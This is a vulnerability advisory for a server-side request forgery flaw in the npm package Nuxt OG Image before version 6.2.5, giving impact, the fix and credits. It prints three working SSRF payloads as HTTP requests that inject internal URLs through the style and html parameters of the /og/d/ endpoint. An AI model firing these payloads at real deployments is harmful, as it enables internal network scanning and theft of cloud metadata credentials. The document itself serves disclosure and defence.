PT-2026-32078 · Npm · Nuxt Og Image

Published

2026-03-31

·

Updated

2026-03-31

CVSS v3.1

5.3

Medium

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Product: Nuxt OG Image Version: < 6.2.5 CWE-ID: CWE-918: Server-Side Request Forgery

Description

The image generation endpoint (/ og/d/) accepts user-controlled parameters that are passed to the server-side renderer without proper validation or filtering. An attacker can trigger server-side requests to internal network addresses through multiple vectors.

Impact

  • Scanning internal ports and services inaccessible from the outside
  • Reading sensitive data from cloud infrastructure metadata services (tokens, credentials) when verbose error output is enabled

Attack Vectors

Three distinct vectors were identified, all exploiting the same underlying lack of URL validation:

Vector 1: CSS background-image injection via style parameter

GET / og/d/og.png?style=background-image:+url('http://127.0.0.1:8888/secret')

Vector 2: <img src> injection via html parameter

GET / og/d/og.png?html=<img src="http://127.0.0.1:8888/secret">
When verbose errors are enabled, the response content is leaked in base64-encoded error messages.

Vector 3: SVG <image href> injection via html parameter

GET / og/d/og.png?html=<svg><image href="http://127.0.0.1:8888/secret"></svg>

Mitigation

Fixed in v6.2.5. The image source plugin now blocks requests to private IP ranges (IPv4/IPv6), loopback addresses, link-local addresses, and cloud metadata endpoints. Decimal/hexadecimal IP encoding bypasses are also handled.

Credits

Researcher: Dmitry Prokhorov (Positive Technologies)

Fix

SSRF

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-918

Related Identifiers

GHSA-PQHR-MP3F-HRPP

Affected Products

Nuxt Og Image